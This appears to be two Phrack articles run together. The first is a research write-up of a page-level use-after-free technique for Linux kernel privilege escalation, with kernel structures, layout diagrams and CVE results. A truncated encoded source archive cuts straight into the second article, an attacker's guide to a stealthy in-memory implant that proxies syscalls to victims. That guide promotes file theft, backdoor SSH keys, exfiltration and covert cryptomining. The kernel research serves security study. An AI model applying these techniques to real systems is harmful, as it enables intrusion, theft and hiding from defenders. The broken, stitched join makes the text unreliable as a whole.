|=-------------=[ A novel page-UAF exploit strategy for ]=-------------=|
|=-------------=[ privilege escalation in Linux systems. ]=-------------=|
|=-----------------------------------------------------------------------=|
|=---------=[ Jinmeng Zhou, Jiayi Hu, Wenbo Shen, Zhiyun Qian ]=---------=|
|=-----------------------------------------------------------------------=|
0 - Introduction
1 - Exploitation background
1.0 - Object-level UAF
1.1 - Previous page-level UAF in cross-cache attacks
2 - General idea
3 - Page-UAF exploitation steps
3.0 - Page-level UAF construction
3.1 - Critical object corruption through page-level UAF
4 - Evaluation results
-- 4.0 - Bridge objects
-- 4.1 - Real-World Exploitation Experiments
-- 4.2 - Comparison of our page-UAF with previous methods
5 - References
-- 0 - Introduction
Many critical heap objects are allocated in dedicated slab caches in the
Linux kernel. Corrupting such objects requires unreliable cross-cache
corruption methods [1][2][3][4], due to the unstable page-level fengshui.
To overcome this, we propose a novel page-UAF-based exploit strategy to
overwrite critical heap objects located in dedicated slab caches.
This method can achieve local privilege escalation without requiring any
pre-existing infoleak primitive (i.e., no need to bypass KASLR); it can
help derive the infoleak primitive and arbitrary write primitive.
We developed 8 end-to-end exploits (https://github.com/Lotuhu/Page-UAF)
by using our page-UAF technique.
-- 1 - Exploitation background
-- 1.0 - Object-level UAF
The standard exploitation of object-level UAF leverages the invalid use of
a freed heap object (vulnerable object) via a dangling pointer. This use
can corrupt another object (target object) that takes the place of the
freed slot. For instance, to hijack control flow, we can corrupt a
function pointer within the target objects using the target value obtained
from a pre-existing information leakage primitive. The object-level UAF
exploitation requires the target object to reuse the freed slot
(previously the vulnerable object). Thus, the vulnerable object and the
target object must be allocated in the same slab cache (typically in
standard caches, e.g., kmalloc-192) and require object-level heap fengshui
to manipulate the memory layout. Dirtycred utilizes a critical-object-UAF
to achieve privilege escalation, using cred and file objects [4].
-- 1.1 - Previous page-level heap fengshui in cross-cache attacks
Nowadays, many critical target objects are allocated in the dedicated
caches (e.g., cred), rendering simple object-level heap fengshui
ineffective. To corrupt these objects, we have to launch cross-cache
attacks that usually rely on page-level heap fengshui [1][2][6]. The
page-level heap fengshui of OOB and UAF are different.
For OOB bugs, typically, an attacker would trigger overflows onto a
subsequent page [1][2]. For instance, after saturating a page (referred
to as "page 1") with many vulnerable objects, the attacker can allocate
target objects to make the slab cache request the following page (referred
to as "page 2"). Consequently, the last vulnerable object on page 1
becomes adjacent to the first target object on page 2, facilitating
overflow from the former to the latter. We can't make sure that the
vulnerable object is the last object on page 1 due to protections such as
CONFIG_SLAB_FREELIST_RANDOM. This page-level heap fengshui requires the
manipulation of page allocation in the buddy system, making the exploits
more unstable.
For UAF bugs, a common strategy is to convert an object-level UAF into
a page-level UAF. Specifically, the idea is to release many vulnerable
objects (one or more of which are freed illegally with dangling pointers)
to force the entire page to be freed. After that, allocate many target
objects so that the same page will be repurposed for the objects'
dedicated slab cache. Finally, the dangling pointer can be used to
overwrite the target object in another cache by page-level UAF.
-- 2 - General idea
Our idea is to induce page-level UAF by causing the free() of specialized
objects (we term them "bridge objects") that correspond to memory pages.
A bridge object is of a type that contains a pointer to the struct page
and is located in standard slab caches. Among others, struct pipe_buffer
is such an example with a field named page (and located in kmalloc-192).
We list the code snippet below:
struct pipe_buffer {
struct page *page;
unsigned int offset, len;
const struct pipe_buf_operations ops;
unsigned int flags;
unsigned long private;
};
Freeing such bridge objects will automatically cause the corresponding 4KB
page to be freed, effectively leading to a page-level UAF primitive. This
is because an object of type struct page (which by itself is 64 bytes in
recent Linux kernels) is used to manage a 4KB physical page in the kernel.
Through such a bridge object, an attacker can read/write the entire 4KB
memory, which can be reclaimed for other objects (including those stored
in dedicated slab caches, e.g., struct cred). This is because the freed
pages can be returned to the buddy allocator for future slab allocations.
Finally, attackers can overwrite the critical objects in such slabs to
achieve privilege escalation (e.g., setting the uid in cred to 0).
A prior work [3] also attempted to corrupt a page pointer (in pipe_buffer)
to construct page-UAF and achieve privilege escalation. Our technique
further defines and generalizes such a page-UAF technique. We will discuss
more differences in detail in Section 4.2, after introducing our exploit
technique.
-- 3 - Exploitation steps
The page-UAF exploit strategy consists of two main steps: page-level UAF
construction and critical object corruption, as discussed in the following.
-- 3.0 - Page-level UAF (Use After Free) construction.
Starting from a memory corruption bug that provides an invalid write of
memory, e.g., OOB, UAF, or double free, we can first spray multiple bridge
objects (at least two) that co-locate with the vulnerable object.
Specifically, for bugs with standard OOB or UAF write primitives, we can
use the write primitive to corrupt the page pointer field in a bridge
object (e.g., the first field of pipe_buffer) such that it points to
another 64-byte page object nearby. This effectively causes two pointers
to point to the same object. A user-space program can trigger free_pages()
on one of the objects (e.g., by calling close()), which will create a
dangling pointer to the freed page object and the corresponding physical
page. In other words, we can read/write the corresponding physical page
that is now considered freed by the OS kernel. For example, one can write
to a pipe, which will lead to a write of the physical page via the
pipe_buffer object.
For bugs that have double-free primitives, which can often be achieved
from UAF by triggering the free() operation twice, we do the following.
For the first free, we spray a harmless object (e.g., msg_msg) to take
the freed slot. The object should take attacker-controlled values from
the user space. Then, we trigger the kernel code to write the harmless
object until reaching a certain offset, using the FUSE technique[1] to
stop the writing right before a planned offset - corresponding to the
page pointer field of a planned bridge object. Now, we trigger the free
for a second time to spray the planned bridge object to take the slot.
The writing process is restarted to continue overwriting the lower bits
of the page pointer field, which leads to a page UAF. Previously, to
trigger page-level frees from double frees, one had to release an entire
slab and then do a cross-cache technique [1][2], whereas no such
requirement is needed in our exploit method.
For a standard OOB and UAF bug, we use the following figures to
demonstrate the memory layout better in various exploitation steps.
To start, we have at least two bridge objects (pipe_buffer1 and
pipe_buffer2) that contain a field of type struct page. The pointers
point to two adjacent page objects that correspond to two continuous
4KB physical pages. Below is the memory layout before triggering the
OOB/UAF corruption:
page * page *
----------[---+---------------][---+---------------]----------
[ * | pipe_buffer1 ][ * | pipe_buffer2 ]
slab cache[ * | ][ * | ]
[ * | ][ * | ]
----------[-+-+---------------][-+-+---------------]----------
| |
+---------+ |
| |
v v
-----------------[---------][---------]-----------------------
[ page1 ][ page2 ]
page pool [ ][ ]
[ ][ ]
-----------------[----+----][----+----]-----------------------
| |
| +------------+
| |
v v
----------+-----------------------+-----------------------+---
physical | 4KB page1 | 4KB page2 |
page | | |
| | |
----------+-----------------------+-----------------------+---
Now, we corrupt the page pointer within pipe_buffer1 to cause it to point
to page2 - this can be achieved by overwriting the lower bits of the
pointer field, similar to what DirtyCred requires [4]. This makes the
pointers in both pipe_buffer1 and pipe_buffer2 point to the same page
object (as shown below). At this point, we can release the page2 object
(along with its corresponding 4KB physical page) through the pointer in
pipe_buffer1. As a result, the page pointer within pipe_buffer2 becomes
a dangling pointer pointing to the freed page. The memory layout after
triggering corruption is shown in the figure below:
page * page * (dangling pointer)
----------[---+---------------][---+---------------]----------
[ * | pipe_buffer1 ][ * | pipe_buffer2 ]
slab cache[ * | ][ * | ]
[ * | ][ * | ]
----------[-+-+---------------][-+-+---------------]----------
| release |
+------------------+ |
| |
v v
-----------------[---------][---------]-----------------------
[ page1 ][..page2..]
page pool [ ][.........]
[ ][.........]
-----------------[----+----][----+----]-----------------------
| |
| +------------+
| |
v v
----------+-----------------------+-----------------------+---
physical | 4KB page1 |......4KB page2........|
page | |.......................|
| |.......................|
----------+-----------------------+-----------------------+---
-- 3.1 - Critical object corruption through page-level UAF
Now that we have a freed a physical page and a dangling pointer that can
read/write to it. It is fairly easy to then allocate and corrupt critical
heap objects. This is because the critical heap objects are eventually
allocated through the buddy allocator at the page granularity. Therefore,
attackers can spray the heap objects into the freed page as long as they
have already exhausted all existing slab caches. For example, we can
overwrite the cred object through the dangling pointer, as shown in the
following figure:
page * page * (dangling pointer)
----------[---+---------------][---+---------------]----------
[ * | pipe_buffer1 ][ * | pipe_buffer2 ]
slab cache[ * | ][ * | ]
[ * | ][ * | ]
----------[-+-+---------------][-+-+---------------]----------
| |
+------------------+ |
| |
v v
-----------------[---------][---------]-----------------------
[ page1 ][ page2 ]
page pool [ ][ ]
[ ][ ]
-----------------[----+----][----+----]-----------------------
| |
| +------------+
| |
v v
----------+-----------------------+[------][------]-------+---
physical | 4KB page1 |[ cred ][ cred ] |
page | |[ ][ ] ... |
| |[ ][ ] |
----------+-----------------------+[------][------]-------+---
-- 4 - Evaluation results
We analyzed the bridge objects in the Linux kernel v5.14. We took a sample
of 26 recent Linux kernel CVEs that are either OOB, UAF, or double-free
from 2020 to 2023. This includes 24 vulnerabilities from prior work [4],
and 2 additional OOB ones missed by the prior work.
-- 4.0 - Bridge objects
We found many objects containing page pointers, which reside in various
standard slab caches of different sizes. The Linux kernel has interfaces
to read/write the physical pages through the page pointers, such as
copy_page_from_iter and copy_page_to_iter (iter usually represents a user
buffer). We list the the bridge objects followed by the slab caches used
to allocate them as follows:
address_space->i_pages (adix_tree_node_cachep)
configfs_buffer->page (kmalloc-128)
pipe_buffer->page (variable size)
st_buffer->reserved_pages (variable size)
bio_vec->bv_page (variable size)
wait_page_queue->page (variable size)
xfrm_state->xfrag->page (kmalloc-1k)
pipe_inode_info->tmp_page (kmalloc-192)
lbuf->l_page (kmalloc-128)
skb_shared_info->frags->bv_page (variable size)
orangefs_bufmap_desc ->page_array (variable size)
pgv->buffer (variable size)
We denote some objects as "variable size" whose sizes could be different
at runtime due to different allocation paths. Some objects are allocated
as arrays with variable sizes using standard kmalloc caches, such as
pipe_buffer, which can be general to many bugs causing memory corruption
in the standard caches (e.g., kmalloc-192).
In addition, certain functions, such as process_vm_rw_core(), allocate
page pointers into the heap and store them in a page array, which can also
be used wih the page-UAF strategy.
-- 4.1 - Real-World Exploitation Experiments
We confirm that 18 out of the 26 CVEs we examined are exploitable using
our proposed technique by manually analyzing the CVE's capabilities. In
total, we developed 8 end-to-end exploits for 4 CVEs (open source at
https://github.com/Lotuhu/Page-UAF), due to time constraints. The 8
unexploitable CVEs are not suitable because they are not general to heap
objects and can only reach certain objects in specific subsystems, e.g.,
eBPF subsystem.
Specifically, we developed 8 end-to-end exploits against CVE-2023-5345,
CVE-2022-0995, CVE-2022-0185, and CVE-2021-22555. The exploits spray
bridge objects to construct page UAF; we specifically target
pipe_buffer->page, configfs_buffer->page, and pgv->buffer. These exploits
are generally easier and more stable because there is no need for
infoleaks, cross-cache attacks, and page-level fengshui.
One exploit against CVE-2023-5345 uses another bridge object, i.e.,
configs_buffer, which also has a field pointing to a newly allocated page.
This object is a little different from pipe_buffer; it has a field with
type char *, but it points to the first byte of a newly allocated physical
page.
Specifically, `buffer->page = (char *)__get_free_pages(GFP_KERNEL, 0);`.
After making a page-UAF by corrupting the lower bits, we can read/write
the whole physical page's content by triggering the `copy_to_iter` and
`copy_from_iter` in function `configfs_read_iter` and
`configfs_write_iter`:
struct configfs_buffer {
size_t count;
loff_t pos;
char * page;
...
}
-- 4.2 - Comparison of our page-UAF method with previous methods
As we can see, our page-UAF exploit strategy can achieve privilege
escalation without requiring infoleaks to bypass KASLR. Additionally, it
offers the capability to leak information via the reading of physical page
memory. It can also help derive arbitrary write primitives via writing to
objects that have pointers in the physical page. Overall, the exploit
strategy reduces the requirements for memory layout manipulation to use
object-level heap fengshui - only the initial fengshui is required to
derive the page-level UAF.
To our knowledge, we have yet to see widespread use of bridge objects to
achieve page-level UAF in real-world exploits. The only example we are
aware of is a CTF competition [3] that uses the struct pipe_buffer as a
bridge object. There are several differences.
First, we made the observation that page-UAF is not limited to the
pipe_buffer object. Instead, any object containing a page pointer can be
a useful object for spray and corrupt, i.e., bridge objects. In fact,
pipe_buffer is isolated into a dedicated slab called "kmalloc-cg" after
Linux kernel v5.14, and will require cross-cache exploit technique to
operate in the future.
Second, our work analyzes many potential bridge objects that have a field
that manages one/multiple physical pages, and further finds feasible paths
to copy the user buffer from/to the physical pages. Therefore, we make the
generalized page-UAF technique more usable and future-proof.
Third, we simplified the exploitation process significantly compared to
[3]: the prior work triggered the page-pointer write twice to construct
the two-level nested page-UAF primitive, which we show is unnecessary and
achieves a lower overall success rate (75% as reported).
Our exploit requires only one page-UAF and simply sprays critical objects
into the freed page for corruption, achieving a 90%-100% success rate.
For example, we spray the pipe_buffer objects and corrupt one of the
"flags" fields, which can write a read-only file (/etc/passwd) to achieve
privilege escalation.
Exploits using our page-UAF strategy are relatively stable due to the
provided information leaking primitive and avoidance of page-level heap
fengshui. We ran five end-to-end exploits for vulnerabilities
CVE-2022-0995 and CVE-2022-0185. Each exploit was run 10 times, achieving
a 90%-100% success rate without any crashes. This is attributed to the
fact that the exploits have a built-in feedback mechanism (i.e., read of
the physical page) that helps make sure the final write is performed on
the right target. Using this feedback mechanism, we can restart the
page-level UAF if the expected target is not detected.
-- 5 - References
[1] CVE-2022-27666: Exploit esp6 modules in Linux kernel.
https://etenal.me/archives/1825
[2] Reviving Exploits Against Cred Structs - Six Byte Cross Cache Overflow
to Leakless Data-Oriented Kernel Pwnage.
https://www.willsroot.io/2022/08/reviving-exploits-against-cred-struct.html
[3] [D^3CTF 2023] d3kcache: From null-byte cross-cache overflow to infinite
arbitrary read & write in physical memory space.
https://github.com/arttnba3/D3CTF2023_d3kcache
[4] Zhenpeng Lin, Yuhang Wu, and Xinyu Xing. 2022. Dirtycred: escalating
privilege in Linux kernel. In Proceedings of the 2021 ACM SIGSAC Conference
on Computer and Communications Security
[5] FUSE for Linux exploitation 101.
https://exploiter.dev/blog/2022/FUSE-exploit.html.
[6] Understanding Dirty Pagetable - m0leCon Finals 2023 CTF Writeup
https://ptr-yudai.hatenablog.com/entry/2023/12/08/093606
-- 6 - Source Code
begin 700 Page-UAF.tar.xz
/Td6WFoAAATm1rRGAgAhARYAAAB0L+Wj4gf/QlxdACgYSOZrHn6LH5JKqOuBL1u0yI8jn3l/4YJfAe
FeddxXmWnllck5WVQbNDCRReRqZ90IwlrMf2MrJzKrBXZRqgdPYinbpAHXJ2xSyp
=====================================================
==Phrack Inc.==
Volume 0x10, Issue 0x47, Phile #0x0E of 0x11
|=-----------------------------------------------------------------------=|
|=-------=[ Stealth Shell: A Fully Virtualized Attack Toolchain ]=-------=|
|=-----------------------------------------------------------------------=|
|=---------------=[ Ryan Petrich (rpetrich@gmail.com) ]=----------------=|
|=-----------------------------------------------------------------------=|
Have you dreamed of a remote shell with the stealth of a custom in-memory
implant and the comfort of a shell running on your local host? Dream no
more, comrade – enjoy this exhaustive discussion of such a tool.
Introduction
~~~~~~~~~~~~
Attackers consider remote shells a foundational element of the attack
development lifecycle because they allow us to carry out operations on a
victim machine. Yet, the "market" for remote shell implementations is
rather stale and stagnant, with vendors offering proprietary tools and
everyone else building custom ones or binding standard in/out/error to a
remote socket before execing the system shell.
Traditional post-exploitation toolchains are either noisy and flexible,
or stealthy and cumbersome. But stealthy remote code execution need not
be unwieldy and slow to operationalize. By rethinking what the "remote"
in remote shell means, we can make shelling into exploited systems much
more difficult to detect.
This paper scrutinizes the remote shell status quo, describes a new class
of shell to simplify target puppetry, and traverses the syscall hells
along the way.
What is a remote interactive shell?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
An interactive shell is a prompt that accepts textual commands as input
from a user and acknowledges the output to the user. Prior to the
popularization of graphical interfaces, shells were the primary mechanism
for users to interact with their computers and still are for many people
of software. Those of us old enough to use DOS may remember the
C:\> prompt fondly, and those older than I may remember earlier ones.
Choice of shell is often personal to those who interact with computers
over extended periods, and experienced hackers customize their shells
with custom prompts, aliases, and scripts.
A *remote* interactive shell performs our commands over a network on
another computer instead of the one we're physically interacting with.
SSH is the canonical tool for legitimate remote interactive shells.
A classic approach is to write an exploit that creates a new socket,
connects to a predefined network address (where we're already listening),
then binds that new socket to standard input and output. After we bind it,
we exec the system's shell interpreter – replacing the service we
exploited (like nginx) with a shell under our control. We call this a
"connectback" shell because the exploit connects back to us.
Alternatively, we could reuse an existing socket (rather than creating a
new socket); we can choose the same socket we used to exploit the target
to maximize our convenience. With this approach, we write our exploit to
bind standard input and output to the existing network socket and exec the
system's shell interpreter. This is creatively known as a "socket reuse"
shell.
Yet another approach involves writing an exploit that launches an implant
– a bit of software that exists only to receive and perform commands
over a network socket – as well as building a custom interactive prompt
that accepts commands from us locally (which we send over the network to
the implant). This approach avoids running a shell on the victim's
infrastructure, but is cumbersome and requires anticipating which
commands we might need ahead of time.
Why do attackers use remote shells?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
I am making the generous assumption that Phrack's audience still consists
of offense-minded folks – i.e., "attackers" – rather than middle-aged
exploit authors who sold out to enrich venture capitalists. So, when I
say, "we," assume our jolly group includes attack-oriented programmers.
When we exploit a vulnerability in a target system, remote shells allow us
to interact with the victim's system and spare us from pre-emptively
defining exactly which tasks we want to perform (when we don't even know
much about the system). For this reason, we often spawn shells during the
exploitation phase of our operations. Interactive prompts make us more
nimble; if we realize we need to do something we hadn't anticipated, we
aren't forced to re-exploit the system with a new payload (which is both
annoying and possibly expensive).
Just as legitimate system administrators often need to log into their
systems and explore them interactively, we will need to explore the
systems under our purview interactively as surprise system administrators.
The disparate hemispheres in traditional shells
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Classic connectback or socket reuse shells only give us access to whatever
packages and tools are on the victim's machine already, in whatever
configuration that system's operator decided. Custom interactive prompts
that communicate with a hand-crafted implant are brittle and make us
reinvent an interactive environment from scratch.
Like most people of software, I heavily customize my environment and do
not like the interactive prompts available for Windows. I am also a lazy
attacker. I refuse the indignity of Powershell and cling to the Linux
utilities burned into my brain, so much so that I descended into a
labyrinthian rabbit hole and traversed the bowels of Linux, macOS, and
Windows for an unreasonable hoard of hours to create my own toolchain and
indulge my persnickety laziness.
You deserve a more civilized attack workflow, too. Let's discuss this
extravagant contraption in detail.
Stealth Shell
~~~~~~~~~~~~~
Stealth shell tooling simplifies how we interact with remote victim
systems while muffling any side effects to elude discovery by defenders.
It not only improves the interactive experience of remote shells, but
veils their activity like custom in-memory exploits (without the
inconvenience of a custom non-standard interactive environment or worse,
being limited to the preordained shellcode we crafted during the
operation's initial stages).
What qualities constitute a tool capable of creating stealth shells? There
are three key criteria a tool must satisfy:
1. Unify the computational resources of multiple machines as if they were
one system
2. Expose access to this system via a standard shell interface that can
run arbitrary programs
3. Hide execution inside an in-memory implant to avoid detection
How does this innovate beyond existing commercial tools like Immunity
Canvas and Core Impact? Those are special, proprietary tools with their
own proprietary ecosystems that you have to buy; any extensions you build
are locked into those walled ecosystems. They also don't do anything to
unify multiple machines under a single illusion; they force you to
explicitly talk to the remote machine using their proprietary
commands and APIs.
A stealth shell is special because the way you interact with it is not
special. It reifies a regular Linux shell so we can use standard UNIX
tools to puppeteer our target machines. This simplifies our workflow to:
1. Discover vulnerable target service
2. Exploit the target service (bring your own vulnerability),
instantiating the stealth shell implant
3. Interact with the target system as if it were local using the virtual
stealth shell:
~* Finding their cyberinsurance policy is as simple as grep; *~
~* Copying the victim's files is as simple as running cp; *~
~* Querying their databases is as simple as running psql; *~
~* Adding a backdoor ssh key is as simple as writing to the target's
.ssh/authorized_keys file; *~
~* Fetching data from other services is as simple as running curl; *~
~* Imaging their disk is as simple as dd; *~
~* Exfiltrating data is as simple as rsync; *~
~* Computing SHA256 hashes using their CPU is as simple as running
xmrig; *~
A stealth shell can access all the packages installed on our machine. It
respects our local configuration, line discipline, and window sizing. We
can use our favorite scripting languages to automate operations against
the victim's machine rather than gluing random snippets of shellcode
together by hand.
At the highest level, the stealth shell collection of tools contain a
fully virtualized attack toolchain. They virtualize the filesystem,
network, and compute resources of both the remote victim system and our
local system, transmogrifying these disparate hemispheres into a unified,
distributed Linux machine at our disposal.
This unified, distributed Linux machine lives in the initial shell process
and any subsequent subprocesses we spawn when interacting with the shell.
We can execute these subprocesses locally or embed them on our victim's
machine via the implant; Stealth shells bequeath us equal access to files
and network connections on either hemisphere of the distributed system
(i.e. both our machine as an attacker and our target / victim machine).
System call remoting with an implant
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
How is it possible for us to command both our system and our victim's as
if they were one distributed Linux machine? We employ the age-old
technique of system call remoting (publicized and later commercialized by
CORE). On whatever machine we're using to mount our attack operation, we
run programs locally but proxy our commands over the network to the target
(victim) machines so our implant executes them instead.
This makes an implant the first critical ingredient we need for syscall
remoting. A stealth shell's implant is lightweight, performing only a few
necessary behaviors. On start, the implant searches for the incoming
socket (the one that triggered the exploit). It next reuses that socket
and sends a hello message to us (on our local machine) indicating the
exploit succeeded. The implant then attentively listens (in a loop) for
when we send it commands to perform.
Stealth shell's implant accepts the following commands:
1. Perform a syscall and report the result back
2. Call a function and report the result back
3. Peek at a range of memory and report the bytes back
4. Poke at a range of memory, writing a specific sequence of bytes into it
Stealth shell uses these commands to perform operations on our behalf.
Let's say we type `stat /target/etc/passwd` into the stealth shell on our
local machine. On the remote victim machine, the implant performs a
newfstatat(AT_FDCWD, "/etc/passwd", ..., AT_SYMLINK_NOFOLLOW) syscall and
dutifully reports back that yes, it did find a passwd file and shows us
the file's attributes.
Similarly, let's say we type `cat /target/etc/passwd` into the stealth
shell. This will have the implant perform openat(AT_FDCWD, "/etc/passwd",
O_RDONLY) followed by a series of read syscalls on the resulting remote
file descriptor. cat will then print the contents of the remote file to
the terminal.
This is all the support we need from the implant to support a stealth
shell for syscall remoting.
Intercepting local syscall operations
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Great! We exploited a given target, then installed the implant that reuses
the victim socket and listens for commands to perform on the (remote)
victim machine. But how do we interact with the victim's remote machine as
if it were our local machine? How can we ensure the commands we enter on
our local machine execute on our victim's remote machine? We need
something that can tell the implant what to do based on what we type into
our local shell. Specifically, we need a component on our machine that
intercepts local syscall requests and instead sends them over the network
for the implant to execute on the victim's system.
To understand how syscall interception works, let's start with "typical"
syscall behavior. How do syscalls normally work when we aren't
manipulating them for crimes, espionage, or escapades? When a process
performs a syscall, the operating system wakes up and its kernel figures
out what operation is associated with the syscall. The kernel performs
the operation on the process and then resumes executing the program.
The program continues doing work, relying on the operation it asked the
kernel to perform.
If we can somehow direct the kernel to hand control over to us, we can
replace the behavior of the operating system with behaviors of our own.
Enter axon, the monitor component that intercepts syscalls in my
implementation of stealth shell. When the kernel receives a syscall from
a process, rather than determining and executing the appropriate
operation, it instead switches to axon and tells it (roughly), "hey, the
program asked me to perform this syscall operation, but you told me to
deliver these requests to you, so now it's your responsibility and I'm not
going to do anything more with the syscall." axon is now the anointed
entity that figures out what to do and when to resume the program.
How do we, the attacker, interact with axon? When we try to interact with
a remote resource via a program we're running in the shell (say, for
example, `cat /target/etc/passwd`), doing whatever we want to do, axon
interrupts the shell, packages the program's request (in this case,
open "/etc/passwd") into a message, sends the message to the implant, and
waits for the implant's response. Once it receives the implant's response
(like "hello here is a file descriptor number representing the file you
asked me to open"), axon resumes our shell – and our shell then continues
with the next step of the program (like cat, which will immediately try to
read the bytes in the file).
Let's inspect each of these steps to see how axon makes this happen.
axon waits on our host (i.e. our local machine) for the implant's hello
message. When it receives the hello message, axon knows the exploit
succeeded and the implant is ready to receive commands. Axon spawns a
subprocess and asks the kernel to deliver all syscall attempts from the
subprocess to axon. Inside the local subprocess, it execs bash, which will
become our running stealth shell. bash begins its normal startup process,
executing as intended… until it tries to perform a syscall.
This (local) bash process tries to perform a syscall operation by sending
its request to the local kernel – but the kernel instead is like, "hold up,
I gotta hand this over to my new bff axon so they can figure out what to
do with it."
In more technical terms, the kernel traps bash's attempt to perform a
syscall operation and delivers the trap to axon as a signal. axon examines
the syscall request described in the signal and inspects its arguments to
decide how to process the syscall.
If the syscall references a path, file descriptor, or network address,
axon must select whether it's a local or remote operation – that is,
whether the implant on the remote victim machine should perform the
operation or if our local machine should instead. The syscall request
itself indicates when commands should be performed on the target (i.e.
remote victim machine) by one of:
1. A path beginning with the /target/ prefix
2. A relative path referencing files out of /target
3. A network address in the virtual target address range
4. A file descriptor the shell process previously opened against a remote
path or network address
We can therefore think of axon as a syscall dispatcher. It examines the
incoming syscalls and, based on their arguments, appropriately routes them
to the host bearing the associated resource.
For example, if we run `stat /etc/hostname`, axon determines that
/etc/hostname is a local path and performs our stat operation locally.
If instead we run `stat /target/etc/passwd`, axon determines that
/target/etc/passwd is a remote path and runs a stat /etc/passwd operation
remotely by asking the implant to perform the operation on our behalf.
This orchestration powers our distributed system.
Let's go a layer deeper, starting with local operations (since that
reflects the simpler path axon can take). If the syscall request doesn't
have any of the indicators of a remote resource described above, axon
calls back into the kernel and requests the exact same syscall operation
the subprocess initially requested. When the syscall completes, axon
delivers the results to the subprocess and resumes the subprocess's
execution. In replaying the syscall request it received, axon behaves as
a "manipulator in the middle" between the running shell process and our
local kernel.
What if we ask the shell to interact by specifying one of the "plz perform
on the victim machine" indicators? For remote operations, axon translates
the resulting syscall operation to the equivalent command the implant
should execute on the target – and respects compatibility with the
target's operating system (like translating a Linux open syscall to
a Windows CreateFileEx function call). axon then serializes this
translated command into a sequence of bytes representing it, sends the
serialized bytes over the network socket (the socket shared with the
implant), and waits for the implant to send a response indicating it
executed the command.
axon's message wakes the remote implant running on our target (it rests in
an idle state while awaiting our signal to perform some remote
operations). The implant accepts axon's serialized bytes, deserializes our
command into a local buffer, and performs axon's requested syscall. When
the syscall completes, the implant serializes the result – including any
mutated data – into a sequence of bytes representing it. It then sends
these serialized bytes back over the network as a response to axon, before
waiting for further commands to perform.
Upon receipt, axon first deserializes the response into its constituent
components; for example, a response to a read request will include the
status of the read syscall, as well as whatever bytes the implant read.
Then axon writes any updated data into the subprocess' address space and
resumes the bash subprocess, awaiting our additional commands (i.e.
syscall requests).
With axon dispatching our commands across the network and the remote
implant executing them on the victim's machine, we've covered the basics
of syscall remoting. To summarize, we can manipulate the target's file and
disk as if they were local files via syscall interception and the implant.
We can remotely puppeteer the victim's system using our local (Linux)
processes. (In practice, we are subject to many fiddly details since axon
must coordinate the simultaneous execution of multiple subprocesses that
each possess distinct emulated file descriptor tables.)
We can now treat the remote (victim) system like it's part of our local
system; we can restore our dignity when targeting Windows or macOS
machines by automagically translating our Linux commands into these
foreign tongues. Is that enough? To reasonable people, yes. But we are
not reasonable people, are we? We need to treat *both* sides as a unified
distributed system to realize the more civilized world of Linux everything
everywhere all at once.
Let's now discuss how a stealth shell does just that.
ti esrever dna ti pilf nwod gnaht ym tup I
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This section has the same basic goals as the prior section and shares much
of the same approach, but runs it backwards and is more extra. Why would
we do this? Because sometimes we want to do crimes on the victim's machine
but do the not-crimes on our local machine, like loading libraries or
writing log messages to our local disk. The more we can do stuff on our
local machine, the more we slink past the defender's gaze.
Consider a crime like cryptomining on the victim's machine. We could:
1. adjust xmrig to be in a big block of shellcode containing all of its
libraries and configuration
2. turn off all its logging
3. have it proxy its network activity through the socket connecting the
victim and us
4. and mask off any other feature that might lead to our discovery
That is a lot of fiddly, manual work and it would be disastrously easy to
slip up – like it writing files onto the victim's disk, trying to activate
a GPU the victim doesn't have, or making bitcoin network requests that the
victim's security stack should trivially detect. Remember, we are
engineers. Like any decent engineer, we should spare ourselves of this
tedious labor by wormholing into building tools to handle this
automatically instead. And that's precisely what I did.
How can we transplant some of the target operations back to our local
machine to suppress noisy side effects? A stealth shell takes the same
mechanism that remotes syscalls and applies it in reverse, executing
programs inside the remote implant. We call these embedded running
programs "picoprocesses" because they're regular Linux programs that each
think they're running as a Linux process, when actually they're embedded
in the implant running inside another process. These picoprocesses even
think they are regular Linux processes when they're running on Windows
or macOS.
Are these real processes? What is real? To them they are.
How can picoprocesses be real if our eyes aren't real?
texec is our stealth shell's mechanism for executing entire programs
remotely on the victim's computer (loading them inside the implant);
texec is short for "target exec" because it execs a program on the
target. To picoprocesses, the previous rules about what is local and what
is remote are flipped – paths prefixed with /target/ reference local
files, with any remaining paths referencing remote files living on our
system. This lets programs running as picoprocesses send commands back to
our local system so texec (which runs locally on our machine) can
perform them.
Note that this also means the target could manipulate our machine if they
discover our presence in their systems. In the spirit of Secure by Design,
stealth shell makes you opt in by prefixing your commands with our helper
program `texec`. (The reference implementation also does some things not
described here to detect and limit the effects of target tampering; we
recommend carrying out your operations from heavily sandboxed
environments).
But that addressable hazard aside, it's just as straightforward for us to
run the same syscall interception activities with the roles reversed. Let's
explore how.
Offloading syscalls with texec
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
How do we intercept syscalls the picoprocess performs without alerting
defenders (or, more realistically, SREs) to our presence? To remain
concealed, the implant shouldn't launch new processes and shouldn't
perform bizarre operations the exploited program wouldn't perform, like
attaching a seccomp trap, ptracing a peer thread, or opening /dev/kvm.
These options aren't available when the target is Windows or macOS anyway.
Prepare for a journey, because performing these functions under such a
restrictive regime requires rather lavish resourcefulness.
With axon, we intercepted syscall events by asking the OS to deliver them
to us rather than letting the kernel execute them by default; we
automatically routed syscalls referencing /target to the implant on the
victim machine (to execute remotely) and let axon handle the other
syscalls on our machine (to execute locally).
texec takes a different approach to syscall interception: texec creates a
virtual remote process by puppeteering the implant into creating and
subsequently executing a Linux program inside the implant's address space
as a picoprocess. texec analyzes programs just-in-time as we request them
and replaces any syscall instructions with a jump to its own handler that
emulates the syscall. In contrast to axon, texec sends any syscalls
referencing /target to the implant (to execute *locally*) and the rest to
texec running on our machine (to execute *remotely*).
Let's tease out this trick, starting with the initial stages of remote
program execution.
texec begins by mapping a small runtime into the target's address space.
It requests the implant call mmap or VirtualAllocEx to reserve some memory
for the runtime and pokes the runtime's contents into memory. The runtime
includes all the facilities texec needs to receive syscall requests,
dispatch syscalls remotely to the attacker's host (a reversal of axon's
role), dispatch them locally on the victim's machine, and manage a virtual
file descriptor table.
With the runtime mapped into the victim process' memory, texec proceeds to
the next phase: running our naughty program of choice inside the implant.
For example, if we enter `texec /bin/xmrig`, we want texec to run the
